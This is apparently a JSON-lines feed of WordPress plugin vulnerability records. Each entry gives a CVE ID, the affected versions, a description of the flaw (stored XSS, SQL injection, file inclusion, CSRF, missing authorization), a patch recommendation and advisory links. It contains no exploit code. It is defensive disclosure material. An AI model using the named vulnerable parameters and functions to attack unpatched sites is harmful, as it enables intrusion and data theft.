{"CVE_ID":"CVE-2023-5737","slug":"wp-migration-duplicator","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The WordPress Backup & Migration WordPress plugin before 1.4.4 does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c761c67c-eab8-4e1b-a332-c9a45e22bb13\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c761c67c-eab8-4e1b-a332-c9a45e22bb13\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3471","slug":"sureforms","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The SureForms  WordPress plugin before 1.4.4 does not have proper authorisation check when updating its settings via the REST API, which could allow Contributor and above roles to perform such action","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa21dd2b-1277-4cf9-b7f6-d4f8a6d518c1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa21dd2b-1277-4cf9-b7f6-d4f8a6d518c1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0405","slug":"gpt3-ai-content-generator","versionEndExcluding":"1.4.38","description":"The GPT AI Power: Content Writer & ChatGPT & Image Generator & WooCommerce Product Writer & AI Training WordPress plugin before 1.4.38 does not perform any kind of nonce or privilege checks before letting logged-in users modify arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ca9ac21-2bce-4480-9079-b4045b261273\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ca9ac21-2bce-4480-9079-b4045b261273\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4471","slug":"xpro-elementor-addons","versionImpact":"1.4.3.1","versionEndExcluding":"1.4.3.2","description":"The 140+ Widgets | Best Addons For Elementor \u2013 FREE for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.3.1 via deserialization of untrusted input in the 'export_content' function. This allows authenticated attackers, with contributor-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.\r\nThanks,\r\nFrancesco","recommendation":"Update to version 1.4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c517278-9d2a-4ef6-bf0e-a62f6b00dd20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c517278-9d2a-4ef6-bf0e-a62f6b00dd20?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/libs\\\/demo-export\\\/classes\\\/class-demo-export-admin.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/libs\\\/demo-export\\\/classes\\\/class-demo-export-admin.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090127\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090127\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4440","slug":"xpro-elementor-addons","versionImpact":"1.4.3","versionEndExcluding":"1.4.3.1","description":"The 140+ Widgets | Best Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5596197e-149d-4072-9fa4-424c9ffd6059?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5596197e-149d-4072-9fa4-424c9ffd6059?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/custom-field\\\/custom-field.php#L1150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/custom-field\\\/custom-field.php#L1150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/contact-form\\\/contact-form.php#L1438\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/contact-form\\\/contact-form.php#L1438\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/post-grid\\\/post-grid.php#L1829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/post-grid\\\/post-grid.php#L1829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/course-grid\\\/course-grid.php#L1918\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/course-grid\\\/course-grid.php#L1918\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/woo-product-grid\\\/woo-product-grid.php#L3812\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/woo-product-grid\\\/woo-product-grid.php#L3812\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22813","slug":"conversational-forms","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ChatBot for WordPress - WPBot Conversational Forms for ChatBot allows Stored XSS.This issue affects Conversational Forms for ChatBot: from n\/a through 1.4.2.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/conversational-forms\\\/vulnerability\\\/wordpress-chatbot-conversational-forms-plugin-1-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/conversational-forms\\\/vulnerability\\\/wordpress-chatbot-conversational-forms-plugin-1-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5164","slug":"bellows-accordion-menu","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Bellows Accordion Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50283a4f-ea59-488a-bab0-dd6bc5718556?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50283a4f-ea59-488a-bab0-dd6bc5718556?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bellows-accordion-menu\\\/tags\\\/1.4.2\\\/includes\\\/bellows.api.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bellows-accordion-menu\\\/tags\\\/1.4.2\\\/includes\\\/bellows.api.php#L5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bellows-accordion-menu\\\/tags\\\/1.4.2\\\/includes\\\/functions.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bellows-accordion-menu\\\/tags\\\/1.4.2\\\/includes\\\/functions.php#L12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10873","slug":"lastudio-element-kit","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.4.2 via the _load_template function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/base\\\/class-widget-base.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/base\\\/class-widget-base.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/base\\\/class-widget-base.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/base\\\/class-widget-base.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/albums\\\/widget-templates\\\/player\\\/global\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/albums\\\/widget-templates\\\/player\\\/global\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/albums\\\/widget-templates\\\/player\\\/global\\\/index.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/albums\\\/widget-templates\\\/player\\\/global\\\/index.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194361%40lastudio-element-kit&new=3194361%40lastudio-element-kit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194361%40lastudio-element-kit&new=3194361%40lastudio-element-kit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59415c36-e48a-4c05-ad22-8d55a9e13bcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59415c36-e48a-4c05-ad22-8d55a9e13bcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10688","slug":"attesa-extra","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Attesa Extra plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.2 via the 'attesa-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3374f89-ae63-45bb-b6a6-9689e2513e69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3374f89-ae63-45bb-b6a6-9689e2513e69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184563\\\/attesa-extra\\\/tags\\\/attesa-extra\\\/panel\\\/attesa-custom-templates.php?old=3181839&old_path=attesa-extra%2Ftags%2Fattesa-extra%2Fpanel%2Fattesa-custom-templates.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184563\\\/attesa-extra\\\/tags\\\/attesa-extra\\\/panel\\\/attesa-custom-templates.php?old=3181839&old_path=attesa-extra%2Ftags%2Fattesa-extra%2Fpanel%2Fattesa-custom-templates.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47181","slug":"email-templates","versionEndExcluding":"1.4.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in wpexpertsio Email Templates Customizer and Designer for WordPress and WooCommerce email-templates allows Cross Site Request Forgery.This issue affects Email Templates Customizer and Designer for WordPress and WooCommerce: from n\/a through 1.4.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/email-templates\\\/wordpress-email-templates-plugin-1-4-2-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/email-templates\\\/wordpress-email-templates-plugin-1-4-2-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0379","slug":"spotlight-social-photo-feeds","versionEndExcluding":"1.4.3","description":"The Spotlight Social Feeds WordPress plugin before 1.4.3 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b4f0c5-c7b1-4ac4-8c9c-f8c35ca5de4a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b4f0c5-c7b1-4ac4-8c9c-f8c35ca5de4a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6809","slug":"simple-media-directory","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Simple Video Directory WordPress plugin before 1.4.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/60abcae5-4c89-4d48-95f8-6a80e5f06a37\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/60abcae5-4c89-4d48-95f8-6a80e5f06a37\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51408","slug":"wp-optin-wheel","versionEndExcluding":"1.4.3","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StudioWombat WP Optin Wheel \u2013 Gamified Optin Email Marketing Tool for WordPress and WooCommerce.This issue affects WP Optin Wheel \u2013 Gamified Optin Email Marketing Tool for WordPress and WooCommerce: from n\/a through 1.4.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-optin-wheel\\\/wordpress-wp-optin-wheel-plugin-1-4-3-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-optin-wheel\\\/wordpress-wp-optin-wheel-plugin-1-4-3-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10117","slug":"gravity-forms-dps-pxpay","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"A vulnerability, which was classified as problematic, was found in Gravity Forms DPS PxPay Plugin up to 1.4.2 on WordPress. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.4.3 is able to address this issue. The name of the patch is 5966a5e6343e3d5610bdfa126a5cfbae95e629b6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230664.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/gravity-forms-dps-pxpay\\\/releases\\\/tag\\\/1.4.3\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/gravity-forms-dps-pxpay\\\/releases\\\/tag\\\/1.4.3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/gravity-forms-dps-pxpay\\\/commit\\\/5966a5e6343e3d5610bdfa126a5cfbae95e629b6\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/gravity-forms-dps-pxpay\\\/commit\\\/5966a5e6343e3d5610bdfa126a5cfbae95e629b6\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230664\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230664\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230664\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230664\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11640","slug":"vikrentcar","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The VikRentCar Car Rental Management System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.2. This is due to missing or incorrect nonce validation on the 'save' function. This makes it possible for unauthenticated attackers to change plugin access privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation allows attackers with subscriber-level privileges and above to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225040\\\/vikrentcar\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225040\\\/vikrentcar\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a4c085a-1601-4c1a-ac17-0f2cf5d02489?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a4c085a-1601-4c1a-ac17-0f2cf5d02489?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13594","slug":"simple-downloads-list","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Simple Downloads List plugin for WordPress is vulnerable to SQL Injection via the 'category' attribute of the 'neofix_sdl' shortcode in all versions up to, and including, 1.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-downloads-list\\\/trunk\\\/lists\\\/list_1\\\/download_list_1.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-downloads-list\\\/trunk\\\/lists\\\/list_1\\\/download_list_1.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226486%40simple-downloads-list&new=3226486%40simple-downloads-list&sfp_email=&sfph_mail=#file14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226486%40simple-downloads-list&new=3226486%40simple-downloads-list&sfp_email=&sfph_mail=#file14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49f5bb21-d18f-453b-bef4-e3b234d162c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49f5bb21-d18f-453b-bef4-e3b234d162c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5792","slug":"houzez-crm","versionImpact":"1.4.2","versionEndExcluding":"1.4.3","description":"The Houzez CRM plugin for WordPress is vulnerable to time-based SQL Injection via the notes \u2018belong_to\u2019 parameter in all versions up to, and including, 1.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Custom-level (seller) access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1d4df4b-ec7a-43f6-8617-161b1600d6d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1d4df4b-ec7a-43f6-8617-161b1600d6d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/favethemes.zendesk.com\\\/hc\\\/en-us\\\/articles\\\/360041639432-Changelog\",\"name\":\"https:\\\/\\\/favethemes.zendesk.com\\\/hc\\\/en-us\\\/articles\\\/360041639432-Changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11776","slug":"pcrecruiter-extensions","versionImpact":"1.4.22","versionEndExcluding":"1.4.23","description":"The PCRecruiter Extensions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PCRecruiter' shortcode in all versions up to, and including, 1.4.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pcrecruiter-extensions\\\/trunk\\\/PCRecruiter-Extensions.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pcrecruiter-extensions\\\/trunk\\\/PCRecruiter-Extensions.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d97e1ec3-321b-4d69-ab69-e3ecab0937b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d97e1ec3-321b-4d69-ab69-e3ecab0937b3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10640","slug":"woocommerce-currency-switcher","versionImpact":"1.4.2.2","versionEndExcluding":"1.4.2.3","description":"The The FOX \u2013 Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.2.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.4.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceb0dffa-02a2-4193-b2c4-4774091eacfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceb0dffa-02a2-4193-b2c4-4774091eacfa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3183018%40woocommerce-currency-switcher&old=3178647%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3183018%40woocommerce-currency-switcher&old=3178647%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8271","slug":"woocommerce-currency-switcher","versionImpact":"1.4.2.1","versionEndExcluding":"1.4.2.2","description":"The The FOX \u2013 Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.2.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode in the 'woocs_get_custom_price_html' function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dec51bd6-2ffe-47b6-9423-6131395bf439?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dec51bd6-2ffe-47b6-9423-6131395bf439?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/tags\\\/1.4.2.1\\\/classes\\\/woocs.php#L4604\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/tags\\\/1.4.2.1\\\/classes\\\/woocs.php#L4604\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150596%40woocommerce-currency-switcher&new=3150596%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150596%40woocommerce-currency-switcher&new=3150596%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11189","slug":"social-share-and-social-locker-arsocial","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Social Share And Social Locker  WordPress plugin before 1.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3d1473a-6d25-447d-af27-f315323fdd62\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3d1473a-6d25-447d-af27-f315323fdd62\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5611","slug":"stratum","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Stratum \u2013 Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018label_years\u2019 attribute within the Countdown widget in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/840dd4a9-103a-4ff9-ba26-3bf5b6e831a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/840dd4a9-103a-4ff9-ba26-3bf5b6e831a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stratum\\\/tags\\\/1.4.0\\\/includes\\\/templates\\\/countdown.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stratum\\\/tags\\\/1.4.0\\\/includes\\\/templates\\\/countdown.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102765#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102765#file1\",\"refsource\":\"\",\"tags\":[]}]"}
